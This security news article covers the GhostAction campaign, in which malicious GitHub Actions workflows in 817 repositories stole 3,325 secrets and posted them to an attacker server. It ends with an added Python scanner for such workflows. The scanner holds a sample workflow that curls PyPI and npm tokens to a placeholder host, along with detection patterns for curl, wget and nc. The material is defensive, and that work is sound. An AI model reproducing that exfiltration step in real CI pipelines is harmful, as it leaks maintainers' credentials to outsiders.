GhostAction Supply Chain Attack on GitHub Exposes 3,325 Secrets

The GhostAction supply chain attack on GitHub compromised 3,325 secrets, including npm, PyPI, AWS, and GitHub tokens, after attackers injected malicious workflows into 817 repositories.

    A new supply chain attack targeting GitHub repositories, now identified as GhostAction, has been confirmed by GitGuardian researchers. The attack led to the theft of 3,325 secrets, exposing tokens and keys across widely used platforms including PyPI, npm, DockerHub, GitHub, AWS, and Cloudflare.

    The first evidence of compromise appeared on September 2, 2025, in the popular project FastUUID. Researchers determined that the campaign was not limited to a single repository, but part of a much larger operation.

    How the Attackers Compromised GitHub Repositories

    The GhostAction campaign leveraged compromised maintainer accounts to insert malicious commits into legitimate projects. Attackers added a malicious GitHub Actions workflow file designed to activate automatically when a “push” occurred or through manual dispatch.

    Once triggered, the workflow:

    • Collected sensitive secrets from the GitHub Actions environment.
    • Exfiltrated them via a curl POST request to a server controlled by the attackers at bold-dhawan[.]45-139-104-115[.]plesk[.]page.

    In the case of FastUUID, attackers managed to steal a PyPI token, though no malicious package releases were made before the compromise was remediated.

    The Scope of the GhostAction Compromise

    GitGuardian’s deeper investigation revealed that this was a broad supply chain campaign rather than a single-target attack. At least 817 repositories were affected, with malicious commits deployed across different projects.

    • 573 repositories were directly alerted via GitHub issues opened by GitGuardian.
    • 100 repositories had already detected the compromise and removed the malicious code.
    • The exfiltration endpoint stopped resolving shortly after researchers exposed the campaign.

    Overall, researchers estimate 3,325 secrets were stolen, including:

    • PyPI tokens
    • npm tokens
    • DockerHub tokens
    • GitHub tokens
    • Cloudflare API tokens
    • AWS access keys
    • Database credentials

    Impact on Open Source Ecosystems

    The campaign compromised nine npm packages and 15 PyPI packages, raising concerns that malicious or trojanized versions could be released if the exposed secrets are not revoked.

    GitGuardian highlighted the broader reach of the attack, noting:

    “This analysis revealed compromised tokens across multiple package ecosystems, including Rust crates and npm packages. Several companies were found to have their entire SDK portfolio compromised, with malicious workflows affecting their Python, Rust, JavaScript, and Go repositories simultaneously.”

    The incident highlights how software supply chains across ecosystems such as npm, PyPI, Rust, and Go are interconnected, meaning a single attack vector can cause cascading risks across multiple environments.

    Comparison With the s1ngularity Campaign

    The GhostAction campaign shows technical and operational similarities to the s1ngularity campaign that surfaced in late August 2025, which also targeted open-source ecosystems and GitHub repositories.

    However, GitGuardian emphasized that it does not believe there is a direct connection between the two operations. While the tactics overlap, the researchers consider GhostAction a distinct supply chain threat.

    GitHub and Ecosystem Response

    On September 5, 2025, GitGuardian escalated the issue by notifying the security teams of GitHub, npm, and PyPI. The coordinated response helped mitigate the potential fallout, although the full scope of the attack remains under monitoring.

    As of now, maintainers of the affected GitHub repositories are urged to rotate every exposed secret and revoke the compromised tokens, so that the stolen credentials cannot be used to publish malicious package updates.

    Enterprise Takeaway From the GhostAction Incident

    The GhostAction attack illustrates the ongoing challenges of supply chain security in open-source software ecosystems. By exploiting trusted maintainer accounts and injecting malicious workflows, attackers were able to compromise multiple repositories and extract secrets across programming languages and platforms.

    For enterprises relying on open-source packages, the incident serves as a reminder that:

    • GitHub Actions workflows can be manipulated to exfiltrate sensitive data.
    • Secrets management and rotation policies must be enforced rigorously.
    • Monitoring for unusual workflow changes is critical in preventing large-scale compromises.
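    As an added example (not code from GitGuardian, GitHub, or this article), the following scanner flags the pattern the incident relied on: a workflow run step that references GitHub secrets inline and pushes data with curl or a similar tool to a host outside an allowlist. It can be run over .github/workflows files in a pre-merge check; the allowlist, the placeholder host collector.example.invalid, and both sample workflows are assumptions constructed for the example.

```python
import re
from urllib.parse import urlparse

# Hosts CI steps are expected to reach (assumption: tune per organisation).
ALLOWED_HOSTS = {"api.github.com", "upload.pypi.org", "registry.npmjs.org"}
SECRET_RE = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
UPLOAD_TOOL_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|nc)\b")

def extract_run_blocks(text):
    """Return the shell text of every `run:` step, without a YAML dependency."""
    lines, blocks, i = text.splitlines(), [], 0
    while i < len(lines):
        m = re.match(r"^(\s*)(?:-\s+)?run:\s*(.*)$", lines[i])
        i += 1
        if not m:
            continue
        indent, body = len(m.group(1)), m.group(2)
        if body.strip() in ("|", "|-", ">", ">-"):  # multi-line block scalar
            body_lines = []
            while i < len(lines) and (not lines[i].strip()
                                      or len(lines[i]) - len(lines[i].lstrip()) > indent):
                body_lines.append(lines[i].strip())
                i += 1
            body = "\n".join(body_lines)
        blocks.append(body)
    return blocks

def scan_workflow(text, allowed_hosts=ALLOWED_HOSTS):
    """One finding per run step that references secrets inline and sends data with
    an upload tool to a host outside the allowlist (env-passed secrets not covered)."""
    findings = []
    for block in extract_run_blocks(text):
        secrets = sorted(set(SECRET_RE.findall(block)))
        hosts = {urlparse(u).hostname for u in URL_RE.findall(block)}
        unknown = sorted(h for h in hosts if h and h not in allowed_hosts)
        if secrets and unknown and UPLOAD_TOOL_RE.search(block):
            findings.append({"hosts": unknown, "secrets": secrets})
    return findings

# Constructed sample workflows so the scanner runs stand-alone (not real files).
BENIGN = """steps:
  - run: twine upload dist/*
    env: {TWINE_PASSWORD: "${{ secrets.PYPI_TOKEN }}"}
"""
SUSPICIOUS = """on: [push, workflow_dispatch]
steps:
  - run: |
      curl -s -X POST -d "p=${{ secrets.PYPI_TOKEN }}&n=${{ secrets.NPM_TOKEN }}" https://collector.example.invalid/in
"""
```

    Running the scanner on every workflow change in a pull request, and diffing its findings against the previous commit, turns the "monitor for unusual workflow changes" advice into an automated gate rather than a manual review.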

    With over 3,000 secrets stolen and at least 817 repositories impacted, GhostAction underscores how supply chain attacks are becoming one of the most disruptive cybersecurity threats to enterprise development pipelines.
